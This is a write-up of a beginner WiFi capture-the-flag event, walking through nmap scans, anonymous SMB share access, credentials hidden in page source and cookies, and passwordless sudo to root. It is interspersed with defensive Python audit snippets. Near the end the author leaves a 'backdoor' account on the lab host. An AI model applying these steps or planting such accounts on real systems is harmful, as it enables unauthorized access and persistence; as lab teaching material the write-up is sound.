1nterrupt WiFi Treasure Hunt Write-up

I attended a small event designed to get high school students interested in computer security. There was a little CTF-type competition that they hosted on several Raspberry Pis. The style behind this was that we had a building with two floors. There were five access points around the building that we had to find. Each 'level' gave hints to the next: you had to get the password for the next access point, then find it, connect, and attack the device on it.

So, let's run through this :D

The first access point is X_guest, where the initial target is 10.0.1.1. This access point is open, so we can immediately connect to the system. Let's run a quick port scan.

root@shadow ~$ nmap -sV 10.0.1.1

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-10 11:27 EST
Nmap scan report for 10.0.1.1
Host is up (0.012s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.22 ((Debian))
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: STAGE1)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: STAGE1)
MAC Address: 44:94:FC:F3:01:14 (Netgear,)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.53 seconds

So, we see that SMB is running on ports 139 and 445. We can list the shares from this server.

root@shadow ~$ smbclient -L 10.0.1.1
Enter root's password: 
Domain=[STAGE1] OS=[Unix] Server=[Samba 3.6.6]

    Sharename       Type      Comment
    ---------       ----      -------
    files           Disk      Open documents
    IPC$            IPC       IPC Service (ctf01b server)
Domain=[STAGE1] OS=[Unix] Server=[Samba 3.6.6]

    Server               Comment
    ---------            -------
    CTF01                ctf01 server
    CTF01B               ctf01b server

    Workgroup            Master
    ---------            -------
    STAGE1               CTF01B
    WORKGROUP            CTF05B

So, now we know that for the workgroup “STAGE1”, there is the share “files”. We can now try to mount this share.

root@shadow /mnt$ smbclient \\\\CTF01B\\files                      
Enter root's password: 
Domain=[STAGE1] OS=[Unix] Server=[Samba 3.6.6]
smb: \>

Sweet, an SMB shell!
Note: when it asked for the “root” password, I just hit enter and it worked. Not sure if it was asking for local or remote root, but either way a blank password worked...
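The share listing above is exactly the kind of output a defender wants to audit: a Disk share reachable with an empty password. As an added example (not part of the original write-up), this Python snippet parses `smbclient -L` output into shares, servers and workgroups, lists the Disk shares, and then checks a constructed, hypothetical smb.conf fragment for the `guest ok = yes` stanza that makes a share anonymously readable. The smb.conf contents are an assumption for illustration; only the listing text comes from the page.

```python
import re

# Constructed from the `smbclient -L 10.0.1.1` output earlier in the write-up.
SMBCLIENT_L_OUTPUT = """Domain=[STAGE1] OS=[Unix] Server=[Samba 3.6.6]

    Sharename       Type      Comment
    ---------       ----      -------
    files           Disk      Open documents
    IPC$            IPC       IPC Service (ctf01b server)
Domain=[STAGE1] OS=[Unix] Server=[Samba 3.6.6]

    Server               Comment
    ---------            -------
    CTF01                ctf01 server
    CTF01B               ctf01b server

    Workgroup            Master
    ---------            -------
    STAGE1               CTF01B
    WORKGROUP            CTF05B
"""

# Constructed, hypothetical smb.conf fragment that would expose such a share.
SMB_CONF = """[global]
   workgroup = STAGE1
   map to guest = Bad User

[files]
   path = /srv/files
   comment = Open documents
   guest ok = yes
   read only = yes

[private]
   path = /srv/private
   valid users = @staff
"""

# Column headers that open each section of the smbclient listing.
HEADERS = {
    ("Sharename", "Type"): "shares",
    ("Server", "Comment"): "servers",
    ("Workgroup", "Master"): "workgroups",
}


def parse_smbclient_list(text):
    """Parse `smbclient -L` output into shares, servers and workgroups."""
    result = {"shares": [], "servers": [], "workgroups": []}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Domain=") or line.startswith("---"):
            continue
        key = tuple(line.split()[:2])
        if key in HEADERS:
            section = HEADERS[key]
            continue
        if section == "shares":
            m = re.match(r"(\S+)\s+(Disk|IPC|Printer)\s*(.*)$", line)
            if m:
                result["shares"].append(
                    {"name": m.group(1), "type": m.group(2), "comment": m.group(3)})
        elif section:
            name, _, comment = line.partition(" ")
            result[section].append((name, comment.strip()))
    return result


def disk_shares(parsed):
    """Names of file (Disk) shares; IPC$ is always present and is not a file share."""
    return [s["name"] for s in parsed["shares"] if s["type"] == "Disk"]


def guest_ok_shares(conf_text):
    """Return share stanzas in an smb.conf text that set `guest ok = yes`."""
    shares, section = [], None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            section = m.group(1)
            continue
        key, _, value = line.partition("=")
        if (section and section.lower() != "global"
                and key.strip().lower() == "guest ok"
                and value.strip().lower() in ("yes", "true", "1")):
            shares.append(section)
    return shares


if __name__ == "__main__":
    listing = parse_smbclient_list(SMBCLIENT_L_OUTPUT)
    print("Disk shares advertised:", disk_shares(listing))
    print("Shares with guest ok = yes:", guest_ok_shares(SMB_CONF))
```

Running the listing parser against a live host's output and the config checker against its smb.conf quickly tells you whether a share like `files` is exposed by design (`guest ok = yes`) or only because `map to guest` quietly turns a bad login into the guest account.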

Now we can list the shared files and directories.

smb: \> ls
  .                                   D        0  Thu Jan  8 23:32:41 2015
  ..                                  D        0  Thu Jan  8 19:05:28 2015
  images                              D        0  Thu Jan  8 23:33:13 2015
  guestWiFi_Disclaimer.pdf            N   969218  Thu Jan  8 23:32:21 2015
  welcome.txt                         N      105  Thu Jan  8 23:32:00 2015
  confidential.txt                    N       51  Thu Jan  8 23:32:00 2015
  mirage.txt                          N        0  Thu Jan  8 23:32:00 2015
  password.txt                        N       27  Thu Jan  8 23:32:00 2015
smb: \> cd images\
smb: \images\> ls
  .                                   D        0  Thu Jan  8 23:33:13 2015
  ..                                  D        0  Thu Jan  8 23:32:41 2015
  XstationLogo_guest.jpg              N   729401  Thu Jan  8 23:33:14 2015

You can get all these files.

smb: \> get password.txt ./password.txt
getting file \password.txt of size 27 as ./password.txt (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)

And since I ran the initial smbclient command in /mnt, the files were downloaded to /mnt.
Most of these files are just jokes...

root@shadow /mnt$ cat password.txt                                                                                                                                                                            
Ever heard of a honey pot?
root@shadow /mnt$ cat mirage.txt                                                                                                                                                           
Do you really think I'd make it this obvious? :-)

root@shadow /mnt$ cat welcome.txt                                                                                                                                                                                 
Welcome to 1NTERRUPT_WOR v2015.1

We're happy to have you here, but there are no passwords in this file.
root@shadow /mnt$

The important file is guestWiFi_Disclaimer.pdf, which gives us the password for X_intranet.

guestWiFiDisclaimer.pdf

Also, since I like to test all possibilities, I tested for some stego on the image “XstationLogo_guest.jpg” in the images directory of the Samba share (which can also be found on the web server at 10.0.1.1/images; dirbuster found that for me after I did all the Samba stuff). I was hesitant at first, because I knew the skill set that this competition was designed for is beginner level, but I took a shot at it anyway. A little easier than I thought: a simple strings gave me this message at the bottom of the file.

==========================
Our revenge is at hand.
There's not a direct path
to the online network, so
I'll have to guide you
through each level.
Get to the X_intranet
network next and look for
the polor bear in the
blizzard.
The password for X_intranet
is uBhENje4.
===========================

Which also gives us the password for X_intranet. That’s the thing with these competitions: There are always multiple ways to solve a problem.

One of the neat things about this particular competition is that it is treated like a real pentest. Instead of staying in one place, there were access points all over the building, so I had to go find the access point for X_intranet. This gives the feeling of a physical pentest, where you are inside a company rather than just focusing on the software aspect.

So, from that image, it gives us a little hint: "look for the polor bear in the blizzard.”

I noted the misspelling of the word ‘polar’, which turned out to be unhelpful.

Now we connect to the X_intranet network, and our next target is 10.0.22.1. A quick port scan gives us the same ports open as before.

We can navigate to the webpage with our browser. But we can see by highlighting that there is hidden text.

Which gives us the password for X_corp.

Also, running stego on the image again gives us

=============================
Great! You should have found
the password to the X_corp
network in the HTML - hiding
in plain sight!
The hints will have to go
deeper or we'll get caught.
Check the comments on the 
X_corp home page for your 
next clue.
=============================

On the X_corp network, there is one host: 10.0.3.1.
Ports 22 and 80 are open. The webpage shows a comment:

    <!-- index.html is the default web page, but it's not necessarily the only page. Address what you seek, and you may find it. -->

Navigating to 10.0.3.1/password gives us:

The password for the X_dev network is: X5FS9k10

You'll be one step away from the online network.

If you watch what you eat, then you'll have your way in.

Next on X_dev is 10.0.4.1.

Navigating to 10.0.4.1 with a web browser gives us a page with a picture of a C file in Xcode. However, looking at the source gives us this:

<script type="text/javascript" src="clue.js">

Which if we look at clue.js, we get

function putCookie() {
    document.cookie="HiddenSSID_X_online=pass_7E7hUTt2;path=/";
}

Which of course gives us a hidden SSID, and password.

Connecting to X_online gives us 10.0.5.1.
A port scan again reveals ports 22 and 80.

Upon connecting to the web server, we see an image of the Computer Fraud and Abuse Act. However, viewing the source of the page gives this:

<script type="text/javascript" src="clue.js">

Which in turn gives us

function putCookie() {
    document.cookie="sshUser_wor123=pass_stopapache2;path=/";
}

So great! We have SSH creds! Note the password saying to “stop apache2”. This means that hopefully, once logged in, we will be able to bring apache2 offline.

root@shadow ~$ ssh wor123@10.0.5.1                                             
wor123@10.0.5.1's password: 
Linux ctf05 3.12.35+ #730 PREEMPT Fri Dec 19 18:31:24 GMT 2014 armv6l

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan  9 21:16:25 2015 from 10.0.5.237
wor123@ctf05 ~ $ ls
hint  pistore.desktop
wor123@ctf05 ~ $ cat hint

 **************************************************************

take a look at the file owners in /var/www and /var/www/images

use "cd /var/www/" to get to the www directory

use "ls -l" for more detailed file information

**************************************************************

wor123@ctf05 ~ $ 

Hooray! Now, the goal here is to find out who is leaving behind the trail to break in, so we can easily find this by looking in /var/www.

wor123@ctf05 ~ $ ls -l /var/www
total 12
-rw-r--r-- 1 tjones root   84 Jan  2 21:29 clue.js
drwxr-xr-x 2 root   root 4096 Jan  2 21:22 images
-rw-r--r-- 1 root   root  129 Jan  2 21:23 index.html
wor123@ctf05 ~ $ ls -l /var/www/images/
total 208
-rw-r--r-- 1 tjones ctf 209536 Jan  2 21:17 screenshot.jpg
wor123@ctf05 ~ $ 
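The hint file asks for exactly the check an incident responder does in a compromised webroot: who owns what, and what is writable. As an added example (not code from the write-up), this Python snippet parses `ls -l` output, attributes files to owners other than the expected one, and flags group- or world-writable entries. The two listings are taken from the page; the third is a constructed, hypothetical listing so the writable-check has something to fire on.

```python
import re

# Constructed from the two `ls -l` listings in the write-up.
LS_L_WWW = """total 12
-rw-r--r-- 1 tjones root   84 Jan  2 21:29 clue.js
drwxr-xr-x 2 root   root 4096 Jan  2 21:22 images
-rw-r--r-- 1 root   root  129 Jan  2 21:23 index.html
"""
LS_L_IMAGES = """total 208
-rw-r--r-- 1 tjones ctf 209536 Jan  2 21:17 screenshot.jpg
"""
# Hypothetical listing (not from the page) with a world-writable upload directory.
LS_L_HYPOTHETICAL = """total 4
drwxrwxrwx 2 www-data www-data 4096 Jan  2 21:30 uploads
"""

# Long-format line: mode, link count, owner, group, size, mtime, name.
LS_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9}[.+@]?)\s+(?P<links>\d+)\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+(?P<size>\d+)\s+(?P<mtime>\w{3}\s+\d{1,2}\s+[\d:]+)\s+(?P<name>.+)$"
)


def parse_ls_l(text, directory):
    """Parse `ls -l` output for `directory` into a list of entry dicts."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if not m:          # skips the "total N" header and anything unparseable
            continue
        entry = m.groupdict()
        entry["links"] = int(entry["links"])
        entry["size"] = int(entry["size"])
        entry["path"] = directory.rstrip("/") + "/" + entry["name"]
        entries.append(entry)
    return entries


def unexpected_owners(entries, expected="root"):
    """Map every owner other than `expected` to the paths they own."""
    owners = {}
    for e in entries:
        if e["owner"] != expected:
            owners.setdefault(e["owner"], []).append(e["path"])
    return owners


def writable_by_others(entries):
    """Paths whose group or other write bit is set (mode chars 5 and 8)."""
    return [e["path"] for e in entries if e["mode"][5] == "w" or e["mode"][8] == "w"]


if __name__ == "__main__":
    found = parse_ls_l(LS_L_WWW, "/var/www") + parse_ls_l(LS_L_IMAGES, "/var/www/images")
    print("Non-root owners:", unexpected_owners(found))
    print("Loose permissions:", writable_by_others(found + parse_ls_l(LS_L_HYPOTHETICAL, "/var/www")))
```

On a real box the same parse can be fed from `ls -l` of every directory under the document root; anything the web server's own user or an interactive account owns in a root-deployed tree deserves a look at its timestamp and contents.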

TJones! Y U DO DIS??

Anyways, there is actually a simple path to root here too.

wor123@ctf05 ~ $ sudo -l
Matching Defaults entries for wor123 on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wor123 may run the following commands on this host:
    (ALL) NOPASSWD: ALL
wor123@ctf05 ~ $ sudo su
root@ctf05:/home/wor123# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),1001(indiecity)
root@ctf05:/home/wor123# service apache2 stop
[....] Stopping web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[ ok waiting ..
root@ctf05:/home/wor123#

And there we go: we were also able to stop apache2, as the password hinted.
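The `sudo -l` output above is the whole privilege-escalation story in one line: `(ALL) NOPASSWD: ALL`. As an added example (not from the write-up), this Python snippet parses `sudo -l` output into per-rule run-as user, tags and command lists, and rates each rule so a fleet-wide audit can surface passwordless full-root grants. The first sample is the page's output for wor123; the second is a constructed, hypothetical least-privilege account shown for contrast.

```python
import re

# Constructed from the `sudo -l` output in the write-up (wor123 on ctf05).
SUDO_L_FULL_ROOT = r"""Matching Defaults entries for wor123 on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wor123 may run the following commands on this host:
    (ALL) NOPASSWD: ALL
"""

# Hypothetical output (not from the page) for an account limited to service control.
SUDO_L_LIMITED = """User webops may run the following commands on this host:
    (root) /usr/sbin/service apache2 restart, /usr/sbin/service apache2 stop
    (root) NOPASSWD: /usr/bin/systemctl status apache2
"""

# A rule line: "(runas[:group]) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return {'user': name, 'rules': [{'runas', 'tags', 'commands'}, ...]}."""
    user, rules, in_rules = None, [], False
    for line in text.splitlines():
        m = re.match(r"User (\S+) may run the following commands", line)
        if m:
            user, in_rules = m.group(1), True
            continue
        if in_rules and line.startswith((" ", "\t")):
            rm = RULE_RE.match(line.strip())
            if rm:
                tags = [t.strip(": ") for t in rm.group("tags").split() if t.strip(": ")]
                cmds = [c.strip() for c in rm.group("cmds").split(",")]
                rules.append({"runas": rm.group("runas"), "tags": tags, "commands": cmds})
    return {"user": user, "rules": rules}


def rule_severity(rule):
    """Rate a rule: passwordless ALL is the worst case, a password-gated
    specific command the least concerning."""
    nopasswd = "NOPASSWD" in rule["tags"]
    full = "ALL" in rule["commands"]
    if full and nopasswd:
        return "critical"
    if full:
        return "high"
    if nopasswd:
        return "medium"
    return "low"


def audit_sudo_l(text):
    """List (severity, user, rule) for every rule in a `sudo -l` transcript."""
    parsed = parse_sudo_l(text)
    return [(rule_severity(r), parsed["user"], r) for r in parsed["rules"]]


if __name__ == "__main__":
    for sample in (SUDO_L_FULL_ROOT, SUDO_L_LIMITED):
        for severity, user, rule in audit_sudo_l(sample):
            print(f"{severity:8} {user}: ({rule['runas']}) {rule['tags']} {rule['commands']}")
```

A "critical" hit means the account is root in all but name; the fix is in `/etc/sudoers` (via `visudo`), narrowing the rule to the specific commands the account actually needs, as the second sample illustrates.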

Finally, since I am such a nice guy, I left my own little ‘backdoor’ here :)
sup3rb4ckd00r:password

Great intro to infosec challenge. Tons of fun!
The software used to set up the Pis will also be released open source, so anyone can set up their own competition just like this! I'll update this post when I get info about it.

P.S. I will post my Vulnhub Pegasus write-up soon! I just haven't had time lately to finish writing it!